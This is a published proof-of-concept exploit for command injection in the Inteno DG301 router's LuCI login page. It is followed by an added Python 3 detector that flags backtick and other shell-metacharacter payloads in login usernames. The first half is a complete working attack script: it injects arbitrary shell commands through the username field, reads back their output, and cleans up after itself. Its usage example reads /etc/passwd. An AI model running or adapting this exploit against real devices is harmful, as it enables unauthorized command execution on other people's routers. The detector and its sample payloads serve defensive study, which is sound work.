Inteno DG301 Remote Command Execution
Source: encripto.no  Author: Guelfo  Published: 2014-02-10

#!/usr/bin/python

################################################################
#                                                              #
# Inteno DG301 Command Injection PoC                           #
#                                                              #
# Vulnerable version: Powered by LuCI Trunk (inteno-1.0.34)    #
#                     OpenWrt Backfire 10.03.1-RC6             #
#                                                              #
# Written by Juan J. Guelfo @ Encripto AS                      #
# post@encripto.no                                             #
#                                                              #
# Copyright 2014 Encripto AS. All rights reserved.             #
#                                                              #
# This software is licensed under the FreeBSD license.         #
# http://www.encripto.no/tools/license.php                     #
#                                                              #
################################################################

import sys, getopt, urllib, urllib2


__version__ = "0.1"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"


# Prints title and other header info
def header():
 print ""
 print " ================================================================= "
 print "|  Inteno DG301 v1.0.34 Command Injection PoC \t\t\t  |".format(__version__)
 print "|  by {0}\t\t  |".format(__author__)
 print " ================================================================= "
 print ""
   
# Prints help   
def help():
 header()
 print """   Usage: python Inteno-DG301-PoC.py [mandatory options]

   Mandatory options:
       -t target               ...Target IP address
       -p port                 ...Port where the HTTP admin interface is listening on
       -c cmd                  ...Command to inject
       
   Example:
       python Inteno-DG301-PoC.py -t 192.168.1.1 -p 80 -c "cat /etc/passwd"
    """
 sys.exit(0)
   
   
   
if __name__ == '__main__':
   
 #Parse options
 try:
  options, args = getopt.getopt(sys.argv[1:], "t:p:c:", ["target=", "port=", "cmd="])

 except getopt.GetoptError, err:
  header()
  print "\n[-] Error: {0}.\n".format(str(err))
  sys.exit(1)

 if not options:
  help()

 target = None
 port = None
 cmd = None
 reset = None
 for opt, arg in options:
  if opt in ("-t"):
   target = arg
  
  if opt in ("-p"):
   port = arg   
   
  if opt in ("-c"):
   cmd = arg 
   
 #Option input validation
 if not target or not port or not cmd:
  help()
  print "[-] Error: Incorrect syntax.\n"
  sys.exit(1)

 header()
 print "[*] Trying to connect to {0}:{1}...".format(target, port)
 headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"}

 try:
  # Inject command
  print "[*] Sending command: {0}".format(cmd)
  data = "username=user`"+ urllib.quote(cmd) + "%20>%20/www/poc.txt`&password=pass"
  r = urllib2.Request("http://%s:%s/cgi-bin/luci" % (target, port), data, headers)
  results = urllib2.urlopen(r).read()
  
  # Retrieve results
  r = urllib2.Request("http://%s:%s/poc.txt" % (target, port), None, headers)
  results = urllib2.urlopen(r).read()
  
  # Show results
  print "[+] Retrieving results...\n"
  print results
  
  # Clean output file
  data = "username=user`rm%20/www/poc.txt`&password=pass"
  r = urllib2.Request("http://%s:%s/cgi-bin/luci" % (target, port), data, headers)
  results = urllib2.urlopen(r).read()
  
  print "[*] Cleaning up...\n"

 except urllib2.URLError:
  print "[-] Error: The connection could not be established.\n"
  
 except IOError as e:
  print "[-] Error: {0}...\n".format(e.strerror)

 sys.exit(0)
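
The PoC above places backtick-wrapped text in the `username` field of the login POST to `/cgi-bin/luci`. The following Python 3 check is an added example for defenders, not part of Encripto's original code: it flags such login requests in captured or proxied traffic. The function names, the username allowlist and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

LOGIN_PATH = "/cgi-bin/luci"  # login endpoint the PoC posts to
# Assumption: legitimate account names use only these characters.
SAFE_USERNAME = re.compile(r"[A-Za-z0-9._-]{1,32}")
# Characters a shell treats specially; used to explain why a request was flagged.
SHELL_META = set("`$;|&<>(){}\\\n\r'\"")


def check_login_post(path, body):
    """Return None for a normal request, otherwise a reason string."""
    if path.split("?", 1)[0] != LOGIN_PATH:
        return None
    # parse_qs percent-decodes values, so %60 is seen as a backtick.
    fields = parse_qs(body, keep_blank_values=True)
    for value in fields.get("username", []):
        if SAFE_USERNAME.fullmatch(value):
            continue
        meta = sorted(SHELL_META.intersection(value))
        if meta:
            return "shell metacharacters in username: " + " ".join(repr(c) for c in meta)
        return "username outside allowlist"
    return None


def scan(requests):
    """Return (index, reason) for every flagged (path, body) pair."""
    hits = []
    for i, (path, body) in enumerate(requests):
        reason = check_login_post(path, body)
        if reason:
            hits.append((i, reason))
    return hits


# Constructed sample requests (path, POST body); not captured traffic.
SAMPLES = [
    ("/cgi-bin/luci", "username=admin&password=S3cret%21"),
    ("/cgi-bin/luci", "username=user`id%20>%20/www/poc.txt`&password=pass"),
    ("/cgi-bin/luci", "username=user%60id%60&password=pass"),
    ("/index.html", ""),
]

if __name__ == "__main__":
    for index, reason in scan(SAMPLES):
        print("request %d flagged: %s" % (index, reason))
```

The same allowlist, applied on the device before the username is used, rejects the request outright instead of only reporting it.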


 